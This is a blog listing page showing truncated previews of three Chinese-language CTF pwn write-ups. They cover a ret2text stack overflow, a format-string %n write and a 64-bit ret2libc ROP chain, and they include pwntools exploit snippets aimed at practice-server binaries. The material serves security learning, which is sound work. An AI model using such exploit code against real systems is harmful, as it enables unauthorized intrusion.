![](https://img-blog.csdnimg.cn/20201014180756926.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
pwn
N1ptune__
这个作者很懒,什么都没留下…
展开
-
ctfshow 基础pwn wp
PWN01简单栈溢出,ret2textfrom pwn import *#p = process("./pwn1")p = remote(ip,port)p.recv()payload = 'a'*(0x9+4) + p32(0x0804850F)p.sendline(payload)p.interactive()PWN0332为程序,栈溢出,无system,ret2libc,32位程序通过栈传参from pwn import *from LibcSearcher import *原创 2021-05-29 00:05:36 · 703 阅读 · 0 评论 -
buu [第五空间2019 决赛]PWN5 wp
存在格式化字符串漏洞经过尝试发现偏移为10from pwn import *addr=0x804c044p=remote("node3.buuoj.cn",29172)#%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数#即 mov [%10$n] , 字符数 payload=p32(addr)+"%10$n"p.sendline(payload)#p32写入的字符数是4p.sendline("4")p.interactive()...原创 2021-05-02 21:16:31 · 225 阅读 · 0 评论 -
buuctf ciscn_2019_c_1 wp
记录下学习pwn的过程(感觉比re难多了,我太菜了)查看保护64位程序,64位程序 的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9,多的参数再通过栈传递在encrypt函数里使用了gets函数,可能有栈溢出发现对输入进行了加密可以使用“\0”绕过构造rop链,需要使用到rdi传递参数,又因为是ubuntu18所以需要栈对齐,使用到一个retfrom pwn import *from LibcSearcher import *p=remote("node原创 2021-05-02 20:44:02 · 385 阅读 · 0 评论